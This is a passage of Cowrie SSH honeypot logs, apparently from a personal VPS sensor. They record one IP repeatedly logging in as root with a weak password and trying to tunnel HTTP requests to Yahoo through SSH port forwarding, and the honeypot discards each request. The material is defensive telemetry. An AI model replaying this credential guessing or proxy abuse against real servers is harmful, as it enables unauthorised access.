57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:25.530540Z","src_ip":"213.209.150.239","session":"c3408665755f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:25.813645Z","src_ip":"213.209.150.239","session":"c3408665755f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":30908,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:30908","sensor":"my-vps","timestamp":"2025-08-26T01:02:25.871519Z","session":"c3408665755f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:25.928316Z","src_ip":"213.209.150.239","session":"c3408665755f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":27757,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:27757","sensor":"my-vps","timestamp":"2025-08-26T01:02:26.082980Z","session":"c3408665755f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:26.139609Z","src_ip":"213.209.150.239","session":"c3408665755f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:26.197103Z","src_ip":"213.209.150.239","session":"c3408665755f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":22816,"dst_ip":"1.2.3.4","dst_port":22,"session":"70d5c186dca2","protocol":"ssh","message":"New connection: 213.209.150.239:22816 (1.2.3.4:22) [session: 70d5c186dca2]","sensor":"my-vps","timestamp":"2025-08-26T01:02:26.252781Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:26.253983Z","src_ip":"213.209.150.239","session":"70d5c186dca2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:26.310747Z","src_ip":"213.209.150.239","session":"70d5c186dca2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:26.593616Z","src_ip":"213.209.150.239","session":"70d5c186dca2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":1302,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:1302","sensor":"my-vps","timestamp":"2025-08-26T01:02:26.651644Z","session":"70d5c186dca2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:26.708889Z","src_ip":"213.209.150.239","session":"70d5c186dca2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":14975,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:14975","sensor":"my-vps","timestamp":"2025-08-26T01:02:26.863131Z","session":"70d5c186dca2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:26.920159Z","src_ip":"213.209.150.239","session":"70d5c186dca2"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:26.978219Z","src_ip":"213.209.150.239","session":"70d5c186dca2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":22874,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb434047f2bf","protocol":"ssh","message":"New connection: 213.209.150.239:22874 (1.2.3.4:22) [session: eb434047f2bf]","sensor":"my-vps","timestamp":"2025-08-26T01:02:27.024244Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:27.024956Z","src_ip":"213.209.150.239","session":"eb434047f2bf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:27.072107Z","src_ip":"213.209.150.239","session":"eb434047f2bf"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:27.307188Z","src_ip":"213.209.150.239","session":"eb434047f2bf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":26337,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:26337","sensor":"my-vps","timestamp":"2025-08-26T01:02:27.355351Z","session":"eb434047f2bf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:27.402425Z","src_ip":"213.209.150.239","session":"eb434047f2bf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":7194,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:7194","sensor":"my-vps","timestamp":"2025-08-26T01:02:27.537500Z","session":"eb434047f2bf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:27.584698Z","src_ip":"213.209.150.239","session":"eb434047f2bf"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:27.632527Z","src_ip":"213.209.150.239","session":"eb434047f2bf"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":22925,"dst_ip":"1.2.3.4","dst_port":22,"session":"000d235b4e62","protocol":"ssh","message":"New connection: 213.209.150.239:22925 (1.2.3.4:22) [session: 000d235b4e62]","sensor":"my-vps","timestamp":"2025-08-26T01:02:27.678536Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:27.679337Z","src_ip":"213.209.150.239","session":"000d235b4e62"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:27.726511Z","src_ip":"213.209.150.239","session":"000d235b4e62"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:27.961153Z","src_ip":"213.209.150.239","session":"000d235b4e62"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":12119,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:12119","sensor":"my-vps","timestamp":"2025-08-26T01:02:28.010046Z","session":"000d235b4e62"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:28.057232Z","src_ip":"213.209.150.239","session":"000d235b4e62"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":5973,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:5973","sensor":"my-vps","timestamp":"2025-08-26T01:02:28.193440Z","session":"000d235b4e62"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:28.240613Z","src_ip":"213.209.150.239","session":"000d235b4e62"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:28.288606Z","src_ip":"213.209.150.239","session":"000d235b4e62"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":22972,"dst_ip":"1.2.3.4","dst_port":22,"session":"decfbb685198","protocol":"ssh","message":"New connection: 213.209.150.239:22972 (1.2.3.4:22) [session: decfbb685198]","sensor":"my-vps","timestamp":"2025-08-26T01:02:28.335245Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:28.336153Z","src_ip":"213.209.150.239","session":"decfbb685198"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:28.383147Z","src_ip":"213.209.150.239","session":"decfbb685198"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:28.617979Z","src_ip":"213.209.150.239","session":"decfbb685198"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":22890,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:22890","sensor":"my-vps","timestamp":"2025-08-26T01:02:28.666237Z","session":"decfbb685198"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:28.713581Z","src_ip":"213.209.150.239","session":"decfbb685198"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":25575,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:25575","sensor":"my-vps","timestamp":"2025-08-26T01:02:28.849604Z","session":"decfbb685198"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:28.896926Z","src_ip":"213.209.150.239","session":"decfbb685198"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:28.945003Z","src_ip":"213.209.150.239","session":"decfbb685198"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":23008,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb4ea2e0ac4d","protocol":"ssh","message":"New connection: 213.209.150.239:23008 (1.2.3.4:22) [session: cb4ea2e0ac4d]","sensor":"my-vps","timestamp":"2025-08-26T01:02:29.000551Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:29.001649Z","src_ip":"213.209.150.239","session":"cb4ea2e0ac4d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:29.058398Z","src_ip":"213.209.150.239","session":"cb4ea2e0ac4d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:29.341139Z","src_ip":"213.209.150.239","session":"cb4ea2e0ac4d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":26783,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:26783","sensor":"my-vps","timestamp":"2025-08-26T01:02:29.399097Z","session":"cb4ea2e0ac4d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:29.455868Z","src_ip":"213.209.150.239","session":"cb4ea2e0ac4d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":8342,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:8342","sensor":"my-vps","timestamp":"2025-08-26T01:02:29.611230Z","session":"cb4ea2e0ac4d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:29.668063Z","src_ip":"213.209.150.239","session":"cb4ea2e0ac4d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:29.726160Z","src_ip":"213.209.150.239","session":"cb4ea2e0ac4d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":23073,"dst_ip":"1.2.3.4","dst_port":22,"session":"925097051d9e","protocol":"ssh","message":"New connection: 213.209.150.239:23073 (1.2.3.4:22) [session: 925097051d9e]","sensor":"my-vps","timestamp":"2025-08-26T01:02:29.782444Z"}
